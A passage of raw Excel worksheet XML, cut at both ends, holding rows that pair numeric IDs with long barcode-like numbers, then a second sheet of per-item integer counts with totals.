      <c r="A5162">
        <v>6095</v>
      </c>
      <c r="B5162">
        <v>1</v>
      </c>
    </row>
    <row r="5163" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5163">
        <v>6096</v>
      </c>
      <c r="B5163">
        <v>1</v>
      </c>
    </row>
    <row r="5164" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5164">
        <v>6097</v>
      </c>
      <c r="B5164">
        <v>1</v>
      </c>
    </row>
    <row r="5165" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5165">
        <v>6098</v>
      </c>
      <c r="B5165">
        <v>1</v>
      </c>
    </row>
    <row r="5166" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5166">
        <v>6099</v>
      </c>
      <c r="B5166">
        <v>1</v>
      </c>
    </row>
    <row r="5167" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5167">
        <v>6100</v>
      </c>
      <c r="B5167">
        <v>1</v>
      </c>
    </row>
    <row r="5168" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5168">
        <v>6101</v>
      </c>
      <c r="B5168">
        <v>1</v>
      </c>
    </row>
    <row r="5169" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5169">
        <v>6102</v>
      </c>
      <c r="B5169">
        <v>1</v>
      </c>
    </row>
    <row r="5170" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5170">
        <v>6103</v>
      </c>
      <c r="B5170">
        <v>1</v>
      </c>
    </row>
    <row r="5171" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5171">
        <v>6104</v>
      </c>
      <c r="B5171">
        <v>1</v>
      </c>
    </row>
    <row r="5172" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5172">
        <v>6105</v>
      </c>
      <c r="B5172">
        <v>1</v>
      </c>
    </row>
    <row r="5173" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5173">
        <v>6106</v>
      </c>
      <c r="B5173">
        <v>1</v>
      </c>
    </row>
    <row r="5174" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5174">
        <v>6107</v>
      </c>
      <c r="B5174">
        <v>1</v>
      </c>
    </row>
    <row r="5175" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5175">
        <v>6108</v>
      </c>
      <c r="B5175">
        <v>1</v>
      </c>
    </row>
    <row r="5176" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5176">
        <v>6109</v>
      </c>
      <c r="B5176">
        <v>1</v>
      </c>
    </row>
    <row r="5177" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5177">
        <v>6110</v>
      </c>
      <c r="B5177">
        <v>1</v>
      </c>
    </row>
    <row r="5178" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5178">
        <v>6111</v>
      </c>
      <c r="B5178">
        <v>1</v>
      </c>
    </row>
    <row r="5179" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5179">
        <v>6112</v>
      </c>
      <c r="B5179">
        <v>1</v>
      </c>
    </row>
    <row r="5180" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5180">
        <v>6113</v>
      </c>
      <c r="B5180">
        <v>1</v>
      </c>
    </row>
    <row r="5181" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5181">
        <v>6114</v>
      </c>
      <c r="B5181">
        <v>1</v>
      </c>
    </row>
    <row r="5182" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5182">
        <v>6115</v>
      </c>
      <c r="B5182">
        <v>1</v>
      </c>
    </row>
    <row r="5183" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5183">
        <v>6116</v>
      </c>
      <c r="B5183">
        <v>1</v>
      </c>
    </row>
    <row r="5184" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5184">
        <v>6117</v>
      </c>
      <c r="B5184">
        <v>1</v>
      </c>
    </row>
    <row r="5185" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5185">
        <v>6118</v>
      </c>
      <c r="B5185">
        <v>1</v>
      </c>
    </row>
    <row r="5186" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5186">
        <v>6119</v>
      </c>
      <c r="B5186">
        <v>1</v>
      </c>
    </row>
    <row r="5187" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5187">
        <v>6120</v>
      </c>
      <c r="B5187">
        <v>1</v>
      </c>
    </row>
    <row r="5188" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5188">
        <v>6121</v>
      </c>
      <c r="B5188">
        <v>1</v>
      </c>
    </row>
    <row r="5189" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5189">
        <v>6122</v>
      </c>
      <c r="B5189">
        <v>1</v>
      </c>
    </row>
    <row r="5190" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5190">
        <v>6123</v>
      </c>
      <c r="B5190">
        <v>1</v>
      </c>
    </row>
    <row r="5191" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5191">
        <v>6124</v>
      </c>
      <c r="B5191">
        <v>1</v>
      </c>
    </row>
    <row r="5192" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5192">
        <v>6125</v>
      </c>
      <c r="B5192">
        <v>1</v>
      </c>
    </row>
    <row r="5193" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5193">
        <v>6126</v>
      </c>
      <c r="B5193">
        <v>1</v>
      </c>
    </row>
    <row r="5194" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5194">
        <v>6127</v>
      </c>
      <c r="B5194">
        <v>1</v>
      </c>
    </row>
    <row r="5195" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5195">
        <v>6128</v>
      </c>
      <c r="B5195">
        <v>1</v>
      </c>
    </row>
    <row r="5196" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5196">
        <v>6129</v>
      </c>
      <c r="B5196">
        <v>1</v>
      </c>
    </row>
    <row r="5197" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5197">
        <v>6130</v>
      </c>
      <c r="B5197">
        <v>1</v>
      </c>
    </row>
    <row r="5198" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5198">
        <v>6131</v>
      </c>
      <c r="B5198">
        <v>1</v>
      </c>
    </row>
    <row r="5199" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5199">
        <v>6132</v>
      </c>
      <c r="B5199">
        <v>1279000550932</v>
      </c>
    </row>
    <row r="5200" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5200">
        <v>6133</v>
      </c>
      <c r="B5200">
        <v>220000240521</v>
      </c>
    </row>
    <row r="5201" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5201">
        <v>6134</v>
      </c>
      <c r="B5201">
        <v>8120118031722</v>
      </c>
    </row>
    <row r="5202" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5202">
        <v>6135</v>
      </c>
      <c r="B5202">
        <v>1282000602468</v>
      </c>
    </row>
    <row r="5203" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5203">
        <v>6136</v>
      </c>
      <c r="B5203">
        <v>9120006272829</v>
      </c>
    </row>
    <row r="5204" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5204">
        <v>6137</v>
      </c>
      <c r="B5204">
        <v>9120103222223</v>
      </c>
    </row>
    <row r="5205" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5205">
        <v>6138</v>
      </c>
      <c r="B5205">
        <v>9120204731886</v>
      </c>
    </row>
    <row r="5206" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5206">
        <v>6139</v>
      </c>
      <c r="B5206">
        <v>9120200860095</v>
      </c>
    </row>
    <row r="5207" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5207">
        <v>6140</v>
      </c>
      <c r="B5207">
        <v>220008580147</v>
      </c>
    </row>
    <row r="5208" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5208">
        <v>1977</v>
      </c>
      <c r="B5208">
        <v>9120307182846</v>
      </c>
    </row>
    <row r="5209" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5209">
        <v>6141</v>
      </c>
      <c r="B5209">
        <v>1272000301474</v>
      </c>
    </row>
    <row r="5210" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5210">
        <v>6142</v>
      </c>
      <c r="B5210">
        <v>8120315190255</v>
      </c>
    </row>
    <row r="5211" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5211">
        <v>6143</v>
      </c>
      <c r="B5211">
        <v>259010012546</v>
      </c>
    </row>
    <row r="5212" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5212">
        <v>6144</v>
      </c>
      <c r="B5212">
        <v>234011072513</v>
      </c>
    </row>
    <row r="5213" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5213">
        <v>6145</v>
      </c>
      <c r="B5213">
        <v>8120315190255</v>
      </c>
    </row>
    <row r="5214" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5214">
        <v>6146</v>
      </c>
      <c r="B5214">
        <v>9120201552579</v>
      </c>
    </row>
    <row r="5215" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5215">
        <v>6147</v>
      </c>
      <c r="B5215">
        <v>220304292574</v>
      </c>
    </row>
    <row r="5216" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5216">
        <v>6148</v>
      </c>
      <c r="B5216">
        <v>1243000351567</v>
      </c>
    </row>
    <row r="5217" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5217">
        <v>6149</v>
      </c>
      <c r="B5217">
        <v>282000922384</v>
      </c>
    </row>
    <row r="5218" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5218">
        <v>6150</v>
      </c>
      <c r="B5218">
        <v>9120206240679</v>
      </c>
    </row>
    <row r="5219" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5219">
        <v>6151</v>
      </c>
      <c r="B5219">
        <v>9120206240679</v>
      </c>
    </row>
    <row r="5220" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5220">
        <v>6152</v>
      </c>
      <c r="B5220">
        <v>129100700243</v>
      </c>
    </row>
    <row r="5221" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5221">
        <v>6153</v>
      </c>
      <c r="B5221">
        <v>9120001512389</v>
      </c>
    </row>
    <row r="5222" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5222">
        <v>6154</v>
      </c>
      <c r="B5222">
        <v>1232002400977</v>
      </c>
    </row>
    <row r="5223" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5223">
        <v>6155</v>
      </c>
      <c r="B5223">
        <v>220002592278</v>
      </c>
    </row>
    <row r="5224" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5224">
        <v>6156</v>
      </c>
      <c r="B5224">
        <v>9120316080573</v>
      </c>
    </row>
    <row r="5225" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5225">
        <v>6157</v>
      </c>
      <c r="B5225">
        <v>220304292574</v>
      </c>
    </row>
    <row r="5226" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5226">
        <v>995</v>
      </c>
    </row>
    <row r="5227" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5227">
        <v>6158</v>
      </c>
      <c r="B5227">
        <v>220200291623</v>
      </c>
    </row>
    <row r="5228" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5228">
        <v>6159</v>
      </c>
      <c r="B5228">
        <v>9120100470789</v>
      </c>
    </row>
    <row r="5229" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A5229">
        <v>6160</v>
      </c>
      <c r="B5229">
        <v>220106290256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6A435-28FE-264B-A1DB-545C61B36E67}">
  <dimension ref="A3:Q1602"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="16.33203125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.5" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="10.5" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="11" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9.6640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="10.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>16227</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>16232</v>
      </c>
    </row>
    <row r="4" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A4" s="6" t="s">
        <v>16225</v>
      </c>
      <c r="B4" t="s">
        <v>16223</v>
      </c>
      <c r="C4" t="s">
        <v>16224</v>
      </c>
      <c r="D4" t="s">
        <v>16229</v>
      </c>
      <c r="E4" t="s">
        <v>16230</v>
      </c>
      <c r="F4" t="s">
        <v>16228</v>
      </c>
      <c r="G4" t="s">
        <v>16231</v>
      </c>
      <c r="H4" t="s">
        <v>16226</v>
      </c>
      <c r="K4" s="9" t="s">
        <v>16225</v>
      </c>
      <c r="L4" s="9" t="s">
        <v>16223</v>
      </c>
      <c r="M4" s="9" t="s">
        <v>16224</v>
      </c>
      <c r="N4" s="9" t="s">
        <v>16229</v>
      </c>
      <c r="O4" s="9" t="s">
        <v>16230</v>
      </c>
      <c r="P4" s="9" t="s">
        <v>16228</v>
      </c>
      <c r="Q4" s="9" t="s">
        <v>16231</v>
      </c>
    </row>
    <row r="5" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A5" s="7">
        <v>7</v>
      </c>
      <c r="B5" s="8">
        <v>6</v>
      </c>
      <c r="C5" s="8">
        <v>2</v>
      </c>
      <c r="D5" s="8">
        <v>0</v>
      </c>
      <c r="E5" s="8">
        <v>0</v>
      </c>
      <c r="F5" s="8">
        <v>4</v>
      </c>
      <c r="G5" s="8">
        <v>2</v>
      </c>
      <c r="H5" s="8">
        <v>14</v>
      </c>
      <c r="K5" s="7">
        <v>7</v>
      </c>
      <c r="L5" s="8">
        <v>6</v>
      </c>
      <c r="M5" s="8">
        <v>2</v>
      </c>
      <c r="N5" s="8">
        <v>0</v>
      </c>
      <c r="O5" s="8">
        <v>0</v>
      </c>
      <c r="P5" s="8">
        <v>4</v>
      </c>
      <c r="Q5" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A6" s="7">
        <v>10</v>
      </c>
      <c r="B6" s="8">
        <v>0</v>
      </c>
      <c r="C6" s="8">
        <v>0</v>
      </c>
      <c r="D6" s="8">
        <v>0</v>
      </c>
      <c r="E6" s="8">
        <v>0</v>
      </c>
      <c r="F6" s="8">
        <v>4</v>
      </c>
      <c r="G6" s="8">
        <v>0</v>
      </c>
      <c r="H6" s="8">
        <v>4</v>
      </c>
      <c r="K6" s="7">
        <v>10</v>
      </c>
      <c r="L6" s="8">
        <v>0</v>
      </c>
      <c r="M6" s="8">
        <v>0</v>
      </c>
      <c r="N6" s="8">
        <v>0</v>
      </c>
      <c r="O6" s="8">
        <v>0</v>
      </c>
      <c r="P6" s="8">
        <v>4</v>
      </c>
      <c r="Q6" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A7" s="7">
        <v>16</v>
      </c>
      <c r="B7" s="8">
        <v>26</v>
      </c>
      <c r="C7" s="8">
        <v>1</v>
      </c>
      <c r="D7" s="8">
        <v>20</v>
      </c>
      <c r="E7" s="8">
        <v>62</v>
      </c>
      <c r="F7" s="8">
        <v>21</v>
      </c>
      <c r="G7" s="8">
        <v>29</v>
      </c>
      <c r="H7" s="8">
        <v>159</v>
      </c>
      <c r="K7" s="7">
        <v>16</v>
      </c>
      <c r="L7" s="8">
        <v>26</v>
      </c>
      <c r="M7" s="8">
        <v>1</v>
      </c>
      <c r="N7" s="8">
        <v>20</v>
      </c>
      <c r="O7" s="8">
        <v>62</v>
      </c>
      <c r="P7" s="8">
        <v>21</v>
      </c>
      <c r="Q7" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="8" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A8" s="7">
        <v>19</v>
      </c>
      <c r="B8" s="8">
        <v>25</v>
      </c>
      <c r="C8" s="8">
        <v>1</v>
      </c>
      <c r="D8" s="8">
        <v>24</v>
      </c>
      <c r="E8" s="8">
        <v>458</v>
      </c>
      <c r="F8" s="8">
        <v>26</v>
      </c>
      <c r="G8" s="8">
        <v>29</v>
      </c>
      <c r="H8" s="8">
        <v>563</v>
      </c>
      <c r="K8" s="7">
        <v>19</v>
      </c>
      <c r="L8" s="8">
        <v>25</v>
      </c>
      <c r="M8" s="8">
        <v>1</v>
      </c>
      <c r="N8" s="8">
        <v>24</v>
      </c>
      <c r="O8" s="8">
        <v>458</v>
      </c>
      <c r="P8" s="8">
        <v>26</v>
      </c>
      <c r="Q8" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="9" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A9" s="7">
        <v>20</v>
      </c>
      <c r="B9" s="8">
        <v>25</v>
      </c>
      <c r="C9" s="8">
        <v>1</v>
      </c>
      <c r="D9" s="8">
        <v>8</v>
      </c>
      <c r="E9" s="8">
        <v>3</v>
      </c>
      <c r="F9" s="8">
        <v>6</v>
      </c>
      <c r="G9" s="8">
        <v>8</v>
      </c>
      <c r="H9" s="8">
        <v>51</v>
      </c>
      <c r="K9" s="7">
        <v>20</v>
      </c>
      <c r="L9" s="8">
        <v>25</v>
      </c>
      <c r="M9" s="8">
        <v>1</v>
      </c>
      <c r="N9" s="8">
        <v>8</v>
      </c>
      <c r="O9" s="8">
        <v>3</v>
      </c>
      <c r="P9" s="8">
        <v>6</v>
      </c>
      <c r="Q9" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A10" s="7">
        <v>21</v>
      </c>
      <c r="B10" s="8">
        <v>26</v>
      </c>
      <c r="C10" s="8">
        <v>1</v>
      </c>
      <c r="D10" s="8">
        <v>41</v>
      </c>
      <c r="E10" s="8">
        <v>250</v>
      </c>
      <c r="F10" s="8">
        <v>12</v>
      </c>
      <c r="G10" s="8">
        <v>48</v>
      </c>
      <c r="H10" s="8">
        <v>378</v>
      </c>
      <c r="K10" s="7">
        <v>21</v>
      </c>
      <c r="L10" s="8">
        <v>26</v>
      </c>
      <c r="M10" s="8">
        <v>1</v>
      </c>
      <c r="N10" s="8">
        <v>41</v>
      </c>
      <c r="O10" s="8">
        <v>250</v>
      </c>
      <c r="P10" s="8">
        <v>12</v>
      </c>
      <c r="Q10" s="8">
        <v>48</v>
      </c>
    </row>
    <row r="11" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A11" s="7">
        <v>27</v>
      </c>
      <c r="B11" s="8">
        <v>0</v>
      </c>
      <c r="C11" s="8">
        <v>0</v>
      </c>
      <c r="D11" s="8">
        <v>0</v>
      </c>
      <c r="E11" s="8">
        <v>0</v>
      </c>
      <c r="F11" s="8">
        <v>58</v>
      </c>
      <c r="G11" s="8">
        <v>36</v>
      </c>
      <c r="H11" s="8">
        <v>94</v>
      </c>
      <c r="K11" s="7">
        <v>27</v>
      </c>
      <c r="L11" s="8">
        <v>0</v>
      </c>
      <c r="M11" s="8">
        <v>0</v>
      </c>
      <c r="N11" s="8">
        <v>0</v>
      </c>
      <c r="O11" s="8">
        <v>0</v>
      </c>
      <c r="P11" s="8">
        <v>58</v>
      </c>
      <c r="Q11" s="8">
        <v>36</v>
      </c>
    </row>
    <row r="12" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A12" s="7">
        <v>28</v>
      </c>
      <c r="B12" s="8">
        <v>0</v>
      </c>
      <c r="C12" s="8">
        <v>0</v>
      </c>
      <c r="D12" s="8">
        <v>0</v>
      </c>
      <c r="E12" s="8">
        <v>0</v>
      </c>
      <c r="F12" s="8">
        <v>54</v>
      </c>
      <c r="G12" s="8">
        <v>46</v>
      </c>
      <c r="H12" s="8">
        <v>100</v>
      </c>
      <c r="K12" s="7">
        <v>28</v>
      </c>
      <c r="L12" s="8">
        <v>0</v>
      </c>
      <c r="M12" s="8">
        <v>0</v>
      </c>
      <c r="N12" s="8">
        <v>0</v>
      </c>
      <c r="O12" s="8">
        <v>0</v>
      </c>
      <c r="P12" s="8">
        <v>54</v>
      </c>
      <c r="Q12" s="8">
        <v>46</v>
      </c>
    </row>
    <row r="13" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A13" s="7">
        <v>29</v>
      </c>
      <c r="B13" s="8">
        <v>26</v>
      </c>
      <c r="C13" s="8">
        <v>0</v>
      </c>
      <c r="D13" s="8">
        <v>0</v>
      </c>
      <c r="E13" s="8">
        <v>0</v>
      </c>
      <c r="F13" s="8">
        <v>4</v>
      </c>
      <c r="G13" s="8">
        <v>3</v>
      </c>
      <c r="H13" s="8">
        <v>33</v>
      </c>
      <c r="K13" s="7">
        <v>29</v>
      </c>
      <c r="L13" s="8">
        <v>26</v>
      </c>
      <c r="M13" s="8">
        <v>0</v>
      </c>
      <c r="N13" s="8">
        <v>0</v>
      </c>
      <c r="O13" s="8">
        <v>0</v>
      </c>
      <c r="P13" s="8">
        <v>4</v>
      </c>
      <c r="Q13" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="14" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A14" s="7">
        <v>34</v>
      </c>
      <c r="B14" s="8">
        <v>25</v>
      </c>
      <c r="C14" s="8">
        <v>0</v>
      </c>
      <c r="D14" s="8">
        <v>5</v>
      </c>
      <c r="E14" s="8">
        <v>7</v>
      </c>
      <c r="F14" s="8">
        <v>4</v>
      </c>
      <c r="G14" s="8">
        <v>4</v>
      </c>
      <c r="H14" s="8">
        <v>45</v>
      </c>
      <c r="K14" s="7">
        <v>34</v>
      </c>
      <c r="L14" s="8">
        <v>25</v>
      </c>
      <c r="M14" s="8">
        <v>0</v>
      </c>
      <c r="N14" s="8">
        <v>5</v>
      </c>
      <c r="O14" s="8">
        <v>7</v>
      </c>
      <c r="P14" s="8">
        <v>4</v>
      </c>
      <c r="Q14" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="15" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A15" s="7">
        <v>35</v>
      </c>
      <c r="B15" s="8">
        <v>20</v>
      </c>
      <c r="C15" s="8">
        <v>1</v>
      </c>
      <c r="D15" s="8">
        <v>98</v>
      </c>
      <c r="E15" s="8">
        <v>51</v>
      </c>
      <c r="F15" s="8">
        <v>10</v>
      </c>
      <c r="G15" s="8">
        <v>8</v>
      </c>
      <c r="H15" s="8">
        <v>188</v>
      </c>
      <c r="K15" s="7">
        <v>35</v>
      </c>
      <c r="L15" s="8">
        <v>20</v>
      </c>
      <c r="M15" s="8">
        <v>1</v>
      </c>
      <c r="N15" s="8">
        <v>98</v>
      </c>
      <c r="O15" s="8">
        <v>51</v>
      </c>
      <c r="P15" s="8">
        <v>10</v>
      </c>
      <c r="Q15" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="16" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A16" s="7">
        <v>42</v>
      </c>
      <c r="B16" s="8">
        <v>25</v>
      </c>
      <c r="C16" s="8">
        <v>0</v>
      </c>
      <c r="D16" s="8">
        <v>0</v>
      </c>
      <c r="E16" s="8">
        <v>0</v>
      </c>
      <c r="F16" s="8">
        <v>56</v>
      </c>
      <c r="G16" s="8">
        <v>11</v>
      </c>
      <c r="H16" s="8">
        <v>92</v>
      </c>
      <c r="K16" s="7">
        <v>42</v>
      </c>
      <c r="L16" s="8">
        <v>25</v>
      </c>
      <c r="M16" s="8">
        <v>0</v>
      </c>
      <c r="N16" s="8">
        <v>0</v>
      </c>
      <c r="O16" s="8">
        <v>0</v>
      </c>
      <c r="P16" s="8">
        <v>56</v>
      </c>
      <c r="Q16" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="17" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A17" s="7">
        <v>46</v>
      </c>
      <c r="B17" s="8">
        <v>26</v>
      </c>
      <c r="C17" s="8">
        <v>1</v>
      </c>
      <c r="D17" s="8">
        <v>18</v>
      </c>
      <c r="E17" s="8">
        <v>20</v>
      </c>
      <c r="F17" s="8">
        <v>33</v>
      </c>
      <c r="G17" s="8">
        <v>34</v>
      </c>
      <c r="H17" s="8">
        <v>132</v>
      </c>
      <c r="K17" s="7">
        <v>46</v>
      </c>
      <c r="L17" s="8">
        <v>26</v>
      </c>
      <c r="M17" s="8">
        <v>1</v>
      </c>
      <c r="N17" s="8">
        <v>18</v>
      </c>
      <c r="O17" s="8">
        <v>20</v>
      </c>
      <c r="P17" s="8">
        <v>33</v>
      </c>
      <c r="Q17" s="8">
        <v>34</v>
      </c>
    </row>
    <row r="18" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A18" s="7">
        <v>47</v>
      </c>
      <c r="B18" s="8">
        <v>25</v>
      </c>
      <c r="C18" s="8">
        <v>1</v>
      </c>
      <c r="D18" s="8">
        <v>0</v>
      </c>
      <c r="E18" s="8">
        <v>0</v>
      </c>
      <c r="F18" s="8">
        <v>2</v>
      </c>
      <c r="G18" s="8">
        <v>0</v>
      </c>
      <c r="H18" s="8">
        <v>28</v>
      </c>
      <c r="K18" s="7">
        <v>47</v>
      </c>
      <c r="L18" s="8">
        <v>25</v>
      </c>
      <c r="M18" s="8">
        <v>1</v>
      </c>
      <c r="N18" s="8">
        <v>0</v>
      </c>
      <c r="O18" s="8">
        <v>0</v>
      </c>
      <c r="P18" s="8">
        <v>2</v>
      </c>
      <c r="Q18" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A19" s="7">
        <v>48</v>
      </c>
      <c r="B19" s="8">
        <v>27</v>
      </c>
      <c r="C19" s="8">
        <v>0</v>
      </c>
      <c r="D19" s="8">
        <v>0</v>
      </c>
      <c r="E19" s="8">
        <v>0</v>
      </c>
      <c r="F19" s="8">
        <v>36</v>
      </c>
      <c r="G19" s="8">
        <v>10</v>
      </c>
      <c r="H19" s="8">
        <v>73</v>
      </c>
      <c r="K19" s="7">
        <v>48</v>
      </c>
      <c r="L19" s="8">
        <v>27</v>
      </c>
      <c r="M19" s="8">
        <v>0</v>
      </c>
      <c r="N19" s="8">
        <v>0</v>
      </c>
      <c r="O19" s="8">
        <v>0</v>
      </c>
      <c r="P19" s="8">
        <v>36</v>
      </c>
      <c r="Q19" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="20" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A20" s="7">
        <v>49</v>
      </c>
      <c r="B20" s="8">
        <v>24</v>
      </c>
      <c r="C20" s="8">
        <v>1</v>
      </c>
      <c r="D20" s="8">
        <v>4</v>
      </c>
      <c r="E20" s="8">
        <v>0</v>
      </c>
      <c r="F20" s="8">
        <v>7</v>
      </c>
      <c r="G20" s="8">
        <v>2</v>
      </c>
      <c r="H20" s="8">
        <v>38</v>
      </c>
      <c r="K20" s="7">
        <v>49</v>
      </c>
      <c r="L20" s="8">
        <v>24</v>
      </c>
      <c r="M20" s="8">
        <v>1</v>
      </c>
      <c r="N20" s="8">
        <v>4</v>
      </c>
      <c r="O20" s="8">
        <v>0</v>
      </c>
      <c r="P20" s="8">
        <v>7</v>
      </c>
      <c r="Q20" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="21" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A21" s="7">
        <v>50</v>
      </c>
      <c r="B21" s="8">
        <v>25</v>
      </c>
      <c r="C21" s="8">
        <v>1</v>
      </c>
      <c r="D21" s="8">
        <v>0</v>
      </c>
      <c r="E21" s="8">
        <v>0</v>
      </c>
      <c r="F21" s="8">
        <v>3</v>
      </c>
      <c r="G21" s="8">
        <v>3</v>
      </c>
      <c r="H21" s="8">
        <v>32</v>
      </c>
      <c r="K21" s="7">
        <v>50</v>
      </c>
      <c r="L21" s="8">
        <v>25</v>
      </c>
      <c r="M21" s="8">
        <v>1</v>
      </c>
      <c r="N21" s="8">
        <v>0</v>
      </c>
      <c r="O21" s="8">
        <v>0</v>
      </c>
      <c r="P21" s="8">
        <v>3</v>
      </c>
      <c r="Q21" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="22" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A22" s="7">
        <v>51</v>
      </c>
      <c r="B22" s="8">
        <v>30</v>
      </c>
      <c r="C22" s="8">
        <v>1</v>
      </c>
      <c r="D22" s="8">
        <v>1</v>
      </c>
      <c r="E22" s="8">
        <v>0</v>
      </c>
      <c r="F22" s="8">
        <v>7</v>
      </c>
      <c r="G22" s="8">
        <v>7</v>
      </c>
      <c r="H22" s="8">
        <v>46</v>
      </c>
      <c r="K22" s="7">
        <v>51</v>
      </c>
      <c r="L22" s="8">
        <v>30</v>
      </c>
      <c r="M22" s="8">
        <v>1</v>
      </c>
      <c r="N22" s="8">
        <v>1</v>
      </c>
      <c r="O22" s="8">
        <v>0</v>
      </c>
      <c r="P22" s="8">
        <v>7</v>
      </c>
      <c r="Q22" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="23" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A23" s="7">
        <v>56</v>
      </c>
      <c r="B23" s="8">
        <v>25</v>
      </c>
      <c r="C23" s="8">
        <v>1</v>
      </c>
      <c r="D23" s="8">
        <v>33</v>
      </c>
      <c r="E23" s="8">
        <v>0</v>
      </c>
      <c r="F23" s="8">
        <v>2</v>
      </c>
      <c r="G23" s="8">
        <v>9</v>
      </c>
      <c r="H23" s="8">
